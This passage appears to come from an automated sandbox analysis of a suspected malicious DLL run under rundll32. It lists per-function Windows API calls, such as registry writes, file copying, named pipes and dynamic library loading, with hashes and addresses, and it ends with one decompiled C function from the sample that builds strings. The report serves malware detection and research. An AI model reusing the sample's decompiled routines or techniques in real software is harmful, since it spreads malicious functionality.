                                • memcpy.NTDLL(?,?,?,?,00000000,034885F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000), ref: 0347C1AB
                                • memcpy.NTDLL(?,?,?,?,?,00000000,034885F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001), ref: 0347C1BE
                                • SwitchToThread.KERNEL32(00000057,00000000,?,0000001E,?,?,?,?,?,00000000,034885F1,?,00000000,0000001E,00000001,00000057), ref: 0347C1E2
                                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000001E,?,?,?,?,?,00000000,034885F1,?,00000000,0000001E), ref: 0347C201
                                • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00000000,?,00000000,034885F1,?,00000000,0000001E,00000001,00000057,?), ref: 0347C227
                                • HeapFree.KERNEL32(00000000,00000001,?,00000001,?,?,00000000,?,00000000,034885F1,?,00000000,0000001E,00000001,00000057,?), ref: 0347C243
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
                                • String ID:
                                • API String ID: 3323474148-0
                                • Opcode ID: 7222f82323ebd2039597be0284689ffe65423f396ff996a2376f04117aca08b4
                                • Instruction ID: 0c14747d55605c60b832704b177f2d981e413fd8669eae40a8ffdfcd37a6898d
                                • Opcode Fuzzy Hash: 7222f82323ebd2039597be0284689ffe65423f396ff996a2376f04117aca08b4
                                • Instruction Fuzzy Hash: 20716971504301AFC721EF65C881A9BBBE8FB49304F09492FF599EB250D731D945CB96
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034805BC Relevance: 21.2, APIs: 14, Instructions: 161memorystringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(?,?,00000000), ref: 034805D3
                                • lstrlen.KERNEL32(?,?,00000000), ref: 034805DA
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 034805F1
                                • lstrcpy.KERNEL32(00000000,?), ref: 03480602
                                • lstrcat.KERNEL32(?,?), ref: 0348061E
                                • lstrcat.KERNEL32(?,?), ref: 0348062F
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 03480640
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 034806DD
                                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,00000000), ref: 03480716
                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 0348072F
                                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 03480739
                                • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 03480749
                                • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 03480762
                                • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 03480772
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
                                • String ID:
                                • API String ID: 333890978-0
                                • Opcode ID: 81c49972dc1ec58761367efd7dbe9363af2e0c1247b54399ae7b014a5d5eb370
                                • Instruction ID: 14d8cec971c213a62fcdabac442627d89739d1d46092d2059dc69c7dfebf2538
                                • Opcode Fuzzy Hash: 81c49972dc1ec58761367efd7dbe9363af2e0c1247b54399ae7b014a5d5eb370
                                • Instruction Fuzzy Hash: 6A517C76400108BFDB12BFA4DC84CAEBBFDFF59244B1A4467FA05AB224D6319A499F50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348AFC2 Relevance: 21.1, APIs: 14, Instructions: 109libraryloaderstringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenW.KERNEL32(?,00000000,?,?,?,0347663D,?,?), ref: 0348AFCF
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,0347663D,?,?), ref: 0348AFF8
                                • lstrcpyW.KERNEL32(-0000FFFE,?), ref: 0348B018
                                • lstrcpyW.KERNEL32(-00000002,?), ref: 0348B034
                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0347663D,?,?), ref: 0348B040
                                • LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,0347663D,?,?), ref: 0348B043
                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0347663D,?,?), ref: 0348B04F
                                • GetProcAddress.KERNEL32(00000000,?), ref: 0348B06C
                                • GetProcAddress.KERNEL32(00000000,?), ref: 0348B086
                                • GetProcAddress.KERNEL32(00000000,?), ref: 0348B09C
                                • GetProcAddress.KERNEL32(00000000,?), ref: 0348B0B2
                                • GetProcAddress.KERNEL32(00000000,?), ref: 0348B0C8
                                • GetProcAddress.KERNEL32(00000000,?), ref: 0348B0DE
                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,0347663D,?,?), ref: 0348B107
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
                                • String ID:
                                • API String ID: 3772355505-0
                                • Opcode ID: 36db9d44152b6802bb023545ad316b4ed28aef3ed97f8bb454eeeb2fcf13b00a
                                • Instruction ID: 965e4847766e965970c9472696ab13c05c3ad3084988140aa45a51d6b59becbf
                                • Opcode Fuzzy Hash: 36db9d44152b6802bb023545ad316b4ed28aef3ed97f8bb454eeeb2fcf13b00a
                                • Instruction Fuzzy Hash: DD3187B150421AAFD711FF24EC85D6BBBECEF09244B04842BE805DF251EB34E801CBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347D016 Relevance: 21.1, APIs: 14, Instructions: 82stringmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenW.KERNEL32(?,?,00000000,?,?,?,03481453,?,?,?), ref: 0347D02D
                                • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,03481453,?,?,?), ref: 0347D038
                                • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,03481453,?,?,?), ref: 0347D040
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 0347D055
                                • lstrcpyW.KERNEL32(00000000,?), ref: 0347D066
                                • lstrcatW.KERNEL32(00000000,?), ref: 0347D078
                                • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,03481453,?,?,?), ref: 0347D07D
                                • lstrcatW.KERNEL32(00000000,034953E0), ref: 0347D089
                                • lstrcatW.KERNEL32(00000000), ref: 0347D092
                                • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,03481453,?,?,?), ref: 0347D097
                                • lstrcatW.KERNEL32(00000000,034953E0), ref: 0347D0A3
                                • lstrcatW.KERNEL32(00000000,00000002), ref: 0347D0BF
                                • CopyFileW.KERNEL32(?,00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,03481453,?,?,?), ref: 0347D0C7
                                • HeapFree.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,03481453,?,?,?), ref: 0347D0D5
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
                                • String ID:
                                • API String ID: 3635185113-0
                                • Opcode ID: 59ec1cfae7903a835b3cb91636f161e870d192b832599a4ccb765cb5448f604a
                                • Instruction ID: 719fcf8bf10666470fcbc706870c50856c34b59e254f2ec2cb0dbe69199bd7cc
                                • Opcode Fuzzy Hash: 59ec1cfae7903a835b3cb91636f161e870d192b832599a4ccb765cb5448f604a
                                • Instruction Fuzzy Hash: E021C532500205BFD722BF249C85E7FBBECEF97A45F21045FF505AA111CB60980686A9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348E19A Relevance: 18.2, APIs: 12, Instructions: 196memorystringthreadCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 03477A61: RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 03477AA6
                                  • Part of subcall function 03477A61: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 03477ABE
                                  • Part of subcall function 03477A61: WaitForSingleObject.KERNEL32(00000000,?,034887CC,?,?), ref: 03477B86
                                  • Part of subcall function 03477A61: HeapFree.KERNEL32(00000000,?,?,034887CC,?,?), ref: 03477BAF
                                  • Part of subcall function 03477A61: HeapFree.KERNEL32(00000000,?,?,034887CC,?,?), ref: 03477BBF
                                  • Part of subcall function 03477A61: RegCloseKey.ADVAPI32(?,?,034887CC,?,?), ref: 03477BC8
                                • lstrcmp.KERNEL32(?,00000000), ref: 0348E211
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0347399C,00000000,00000000), ref: 0348E23D
                                • GetCurrentThreadId.KERNEL32 ref: 0348E2EE
                                • GetCurrentThread.KERNEL32 ref: 0348E2FF
                                • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,Function_00001B71,0347399C,00000001,76CDF730,00000000,00000000), ref: 0348E33C
                                • HeapFree.KERNEL32(00000000,?,?,?,00000000,?,Function_00001B71,0347399C,00000001,76CDF730,00000000,00000000), ref: 0348E350
                                • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0348E35E
                                • wsprintfA.USER32 ref: 0348E376
                                  • Part of subcall function 03473263: lstrlen.KERNEL32(?,00000000,03493716,00000000,03482466,?,?,?,03488A07,?,?,?,00000000,00000001,00000000,?), ref: 0347326D
                                  • Part of subcall function 03473263: lstrcpy.KERNEL32(00000000,?), ref: 03473291
                                  • Part of subcall function 03473263: StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,03488A07,?,?,?,00000000,00000001,00000000,?,00000000), ref: 03473298
                                  • Part of subcall function 03473263: lstrcat.KERNEL32(00000000,?), ref: 034732EF
                                • lstrlen.KERNEL32(00000000,00000000), ref: 0348E381
                                • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 0348E398
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0348E3A9
                                • HeapFree.KERNEL32(00000000,?), ref: 0348E3B5
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
                                • String ID:
                                • API String ID: 773763258-0
                                • Opcode ID: 98c5eb3e686b86a330bc0f44a88f718b65873325d72768458db57fb490f6fa94
                                • Instruction ID: 5a3ad6203341adaefb04acb61aead86057b965632f7211a23673365e8ca3d05f
                                • Opcode Fuzzy Hash: 98c5eb3e686b86a330bc0f44a88f718b65873325d72768458db57fb490f6fa94
                                • Instruction Fuzzy Hash: E2712375900219EFDB11EFA5D885DEEBBF9FF09310F04406AE604BB220D730AA85DB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034751FF Relevance: 18.2, APIs: 12, Instructions: 186synchronizationstringthreadCOMMON
                                Download Yara Rule
                                APIs
                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03475226
                                • memcpy.NTDLL(?,?,00000010), ref: 03475249
                                • memset.NTDLL ref: 03475295
                                • lstrcpyn.KERNEL32(?,?,00000034), ref: 034752A9
                                • GetLastError.KERNEL32 ref: 034752D7
                                • GetLastError.KERNEL32 ref: 0347531E
                                • GetLastError.KERNEL32 ref: 0347533D
                                • WaitForSingleObject.KERNEL32(?,000927C0), ref: 03475377
                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 03475385
                                • GetLastError.KERNEL32 ref: 03475408
                                • ReleaseMutex.KERNEL32(?), ref: 0347541A
                                • RtlExitUserThread.NTDLL(?), ref: 03475430
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
                                • String ID:
                                • API String ID: 4037736292-0
                                • Opcode ID: 5ea3045d65218a1c2ae65653524a14b5a0d73224c84b76d48aa8f84e1eb0646f
                                • Instruction ID: ba795cc449fd5216c81784fef4f08449abe5584095760d9c226772717a66b4ea
                                • Opcode Fuzzy Hash: 5ea3045d65218a1c2ae65653524a14b5a0d73224c84b76d48aa8f84e1eb0646f
                                • Instruction Fuzzy Hash: 48618A71504300AFD721EF269848AABB7E8FF86710F148A5FF5969E290E7B0E4058B56
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347D9F6 Relevance: 18.1, APIs: 12, Instructions: 136stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000,76C85520,?,00000000,?,?,?), ref: 0347DA0C
                                • lstrlen.KERNEL32(?), ref: 0347DA14
                                • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0347DA24
                                • lstrcpy.KERNEL32(00000000,?), ref: 0347DA43
                                • lstrlen.KERNEL32(?), ref: 0347DA58
                                • lstrlen.KERNEL32(?), ref: 0347DA66
                                • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 0347DAB4
                                • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 0347DAD8
                                • lstrlen.KERNEL32(?), ref: 0347DB0B
                                • HeapFree.KERNEL32(00000000,?,?), ref: 0347DB36
                                • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 0347DB4D
                                • HeapFree.KERNEL32(00000000,?,?), ref: 0347DB5A
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Heap$Free$Allocatelstrcpy
                                • String ID:
                                • API String ID: 904523553-0
                                • Opcode ID: f7adb887aec339cb9c55313386e059971b625817eceb3eb98a16b01f3f42bbb8
                                • Instruction ID: 3c7cb935ddb4e52490466bfb66656098cacf3d62eda2cb6b282afb0fb667a804
                                • Opcode Fuzzy Hash: f7adb887aec339cb9c55313386e059971b625817eceb3eb98a16b01f3f42bbb8
                                • Instruction Fuzzy Hash: 50418A32910249FFCF12DFA5CC44AAEBBB9FF46310F188466F915AB250D730A911DBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03481FE9 Relevance: 18.1, APIs: 12, Instructions: 104synchronizationpipethreadCOMMON
                                Download Yara Rule
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0348201B
                                • WaitForSingleObject.KERNEL32(000005BC,00000000), ref: 0348203D
                                • ConnectNamedPipe.KERNEL32(?,?), ref: 0348205D
                                • GetLastError.KERNEL32 ref: 03482067
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0348208B
                                • FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,?,00000010,00000000), ref: 034820CE
                                • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 034820D7
                                • WaitForSingleObject.KERNEL32(00000000), ref: 034820E0
                                • CloseHandle.KERNEL32(?), ref: 034820F5
                                • GetLastError.KERNEL32 ref: 03482102
                                • CloseHandle.KERNEL32(?), ref: 0348210F
                                • RtlExitUserThread.NTDLL(000000FF), ref: 03482125
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
                                • String ID:
                                • API String ID: 4053378866-0
                                • Opcode ID: 19eb3de61c367a2dd1a405630053d079e291eb84043f51a61073a43da4b1c034
                                • Instruction ID: 8b440cd1077b47a8482d294b777ad6a8e21d98af5bad018ffa8685fd8a2c04e6
                                • Opcode Fuzzy Hash: 19eb3de61c367a2dd1a405630053d079e291eb84043f51a61073a43da4b1c034
                                • Instruction Fuzzy Hash: 8B319F70404305AFE711EF24CC4996FBBE9FB46314F204E2BFA65AA1A0D7709945CB96
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03484140 Relevance: 18.1, APIs: 12, Instructions: 95registrymemorystringCOMMON
                                Download Yara Rule
                                APIs
                                • RtlImageNtHeader.NTDLL(?), ref: 03484151
                                • GetTempPathA.KERNEL32(00000000,00000000,?,?,034809CF,00000094,00000000,00000000,?), ref: 03484169
                                • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 03484178
                                • GetTempPathA.KERNEL32(00000001,00000000,?,?,034809CF,00000094,00000000,00000000,?), ref: 0348418B
                                • GetTickCount.KERNEL32 ref: 0348418F
                                • wsprintfA.USER32 ref: 034841A6
                                • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 034841E1
                                • StrRChrA.SHLWAPI(00000000,00000000,?), ref: 03484201
                                • lstrlen.KERNEL32(00000000), ref: 0348420B
                                • RegSetValueExA.ADVAPI32(00000001,00000001,00000000,00000001,00000000,00000001), ref: 0348421B
                                • RegCloseKey.ADVAPI32(?), ref: 03484227
                                • HeapFree.KERNEL32(00000000,00000000,00000000,?), ref: 03484235
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTickValuelstrlenwsprintf
                                • String ID:
                                • API String ID: 3778301466-0
                                • Opcode ID: 4915779e5dba66e3eb683747748ae45f576569aa73387118b2f4e98c44c80928
                                • Instruction ID: fc9b96f1803f4f8b38ccef39d02d21bad62f47d2e88dd80a075034fe19ec8850
                                • Opcode Fuzzy Hash: 4915779e5dba66e3eb683747748ae45f576569aa73387118b2f4e98c44c80928
                                • Instruction Fuzzy Hash: 213167B1400219BFDB11AFA5EC88DAF7BECEF56395B154166F905EF200D7348A11DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03475093 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120memorythreadstringCOMMON
                                Download Yara Rule
                                APIs
                                • RtlImageNtHeader.NTDLL(00000000), ref: 034750BD
                                • GetCurrentThreadId.KERNEL32 ref: 034750D3
                                • GetCurrentThread.KERNEL32 ref: 034750E4
                                  • Part of subcall function 0348508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 0348509E
                                  • Part of subcall function 0348508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850B7
                                  • Part of subcall function 0348508C: GetCurrentThreadId.KERNEL32 ref: 034850C4
                                  • Part of subcall function 0348508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850D0
                                  • Part of subcall function 0348508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850DE
                                  • Part of subcall function 0348508C: lstrcpy.KERNEL32(00000000), ref: 03485100
                                  • Part of subcall function 03490551: lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,00000000,76C85520,00000000,?,0347512E,00000020,00000000,?,00000000), ref: 034905BC
                                  • Part of subcall function 03490551: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000001,00000000,00000000,76C85520,00000000,?,0347512E,00000020,00000000,?,00000000), ref: 034905E4
                                • HeapFree.KERNEL32(00000000,?,?,?,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 0347515E
                                • HeapFree.KERNEL32(00000000,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 0347516A
                                • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 034751B9
                                • wsprintfA.USER32 ref: 034751D1
                                • lstrlen.KERNEL32(00000000,00000000), ref: 034751DC
                                • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 034751F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
                                • String ID: W
                                • API String ID: 630447368-655174618
                                • Opcode ID: 604f9741151c7458afc870853f1160c7399f329026e113426670bfbc162a977d
                                • Instruction ID: c5c8b44485d222da439a507c09e705d1f4bb078d0333221cf85c758ccce6ad36
                                • Opcode Fuzzy Hash: 604f9741151c7458afc870853f1160c7399f329026e113426670bfbc162a977d
                                • Instruction Fuzzy Hash: 10414774900218AFDB12EFA1DC449AFBFB8FF4A641B14406BF904EE214D7349A50DBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348B804 Relevance: 16.7, APIs: 11, Instructions: 157registrystringfileCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0348B82F
                                  • Part of subcall function 0348447B: RegCloseKey.ADVAPI32(?,?), ref: 03484502
                                • RegOpenKeyA.ADVAPI32(80000001,03484833,?), ref: 0348B86A
                                • lstrcpyW.KERNEL32(-00000002,94E85600), ref: 0348B8CC
                                • lstrcatW.KERNEL32(00000000,?), ref: 0348B8E1
                                • lstrcpyW.KERNEL32(?), ref: 0348B8FB
                                • lstrcatW.KERNEL32(00000000,?), ref: 0348B90A
                                  • Part of subcall function 0348452B: lstrlenW.KERNEL32(?,?,?,0347E51D,?,?,?,?,00001000,?,?,00001000), ref: 0348453E
                                  • Part of subcall function 0348452B: lstrlen.KERNEL32(?,?,0347E51D,?,?,?,?,00001000,?,?,00001000), ref: 03484549
                                  • Part of subcall function 0348452B: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 0348455E
                                • RegCloseKey.ADVAPI32(03484833,?,?,03484833), ref: 0348B974
                                  • Part of subcall function 0347C2AA: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,0347171E,?,?,00000000,?), ref: 0347C2B6
                                  • Part of subcall function 0347C2AA: memcpy.NTDLL(00000000,00000000,00000000,00000002,?,?,0347171E,?,?,00000000,?), ref: 0347C2DE
                                  • Part of subcall function 0347C2AA: memset.NTDLL ref: 0347C2F0
                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,03484833), ref: 0348B9A9
                                • GetLastError.KERNEL32(?,?,03484833), ref: 0348B9B4
                                • HeapFree.KERNEL32(00000000,00000000,?,?,03484833), ref: 0348B9CA
                                • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,?,?,03484833), ref: 0348B9DC
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
                                • String ID:
                                • API String ID: 1430934453-0
                                • Opcode ID: f4bd2ddbbc06bb507e0e7202ef3550d131c0067e81d7dd4f5cd6d16bc3d80746
                                • Instruction ID: e0fad12d05478ff2b39764898e72853f9ef1c30a3848f51b464841d8d0244bf2
                                • Opcode Fuzzy Hash: f4bd2ddbbc06bb507e0e7202ef3550d131c0067e81d7dd4f5cd6d16bc3d80746
                                • Instruction Fuzzy Hash: 96515975900219EFDB11FFA5DC84EAE7BF9EF19300B14055BE900AF214E7309A069BA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 034362F6 Relevance: 16.6, APIs: 11, Instructions: 145stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 55%
                                			E034362F6(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				WCHAR* _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __edi;
				void* __esi;
				WCHAR* _t58;
				signed int _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t70;
				void* _t72;
				void* _t75;
				void* _t76;
				WCHAR* _t80;
				WCHAR* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				intOrPtr _t92;
				signed int _t103;
				void* _t104;
				intOrPtr _t105;
				void* _t107;
				intOrPtr* _t115;
				void* _t119;
				WCHAR* _t125;

				_t58 =  *0x343a3dc; // 0x55e9c18
				_v24 = _t58;
				_v28 = 8;
				_v20 = GetTickCount();
				_t60 = E03437367();
				_t103 = 5;
				_t98 = _t60 % _t103 + 6;
				_t62 = E03437367();
				_t117 = _t62 % _t103 + 6;
				_v32 = _t62 % _t103 + 6;
				_t64 = E0343117A(_t60 % _t103 + 6);
				_v16 = _t64;
				if(_t64 != 0) {
					_t66 = E0343117A(_t117);
					_v12 = _t66;
					if(_t66 != 0) {
						_push(5);
						_t104 = 0xa;
						_t119 = E034367E7(_t104,  &_v20);
						if(_t119 == 0) {
							_t119 = 0x343918c;
						}
						_t70 = E0343659E(_v24);
						_v8 = _t70;
						if(_t70 != 0) {
							_t115 = __imp__;
							_t72 =  *_t115(_t119);
							_t75 =  *_t115(_v8);
							_t76 =  *_t115(_a4);
							_t80 = E03436D63(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
							_v24 = _t80;
							if(_t80 != 0) {
								_t105 =  *0x343a348; // 0x21ad5a8
								_t28 = _t105 + 0x343bb30; // 0x530025
								wsprintfW(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
								_push(4);
								_t107 = 5;
								_t83 = E034367E7(_t107,  &_v20);
								_a8 = _t83;
								if(_t83 == 0) {
									_a8 = 0x3439190;
								}
								_t84 =  *_t115(_a8);
								_t85 =  *_t115(_v8);
								_t86 =  *_t115(_a4);
								_t125 = E03436D63(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
								if(_t125 == 0) {
									E03436C2C(_v24);
								} else {
									_t92 =  *0x343a348; // 0x21ad5a8
									_t44 = _t92 + 0x343bca8; // 0x73006d
									wsprintfW(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
									 *_a16 = _v24;
									_v28 = _v28 & 0x00000000;
									 *_a20 = _t125;
								}
							}
							E03436C2C(_v8);
						}
						E03436C2C(_v12);
					}
					E03436C2C(_v16);
				}
				return _v28;
			}


































                                0x034362fc
                                0x03436304
                                0x03436307
                                0x03436314
                                0x03436317
                                0x0343631e
                                0x03436325
                                0x03436328
                                0x03436335
                                0x03436338
                                0x0343633b
                                0x03436340
                                0x03436345
                                0x0343634d
                                0x03436352
                                0x03436357
                                0x0343635d
                                0x03436361
                                0x0343636a
                                0x0343636e
                                0x03436370
                                0x03436370
                                0x03436378
                                0x0343637d
                                0x03436382
                                0x03436388
                                0x0343638f
                                0x034363a0
                                0x034363a7
                                0x034363b9
                                0x034363be
                                0x034363c3
                                0x034363cc
                                0x034363de
                                0x034363f4
                                0x034363f9
                                0x034363fd
                                0x03436401
                                0x03436406
                                0x0343640b
                                0x0343640d
                                0x0343640d
                                0x03436417
                                0x03436420
                                0x03436427
                                0x03436443
                                0x03436447
                                0x03436480
                                0x03436449
                                0x0343644c
                                0x03436454
                                0x03436465
                                0x0343646d
                                0x03436475
                                0x03436479
                                0x03436479
                                0x03436447
                                0x03436488
                                0x03436488
                                0x03436490
                                0x03436490
                                0x03436498
                                0x03436498
                                0x034364a4

                                APIs
                                • GetTickCount.KERNEL32 ref: 0343630E
                                • lstrlen.KERNEL32(00000000,00000005), ref: 0343638F
                                • lstrlen.KERNEL32(?), ref: 034363A0
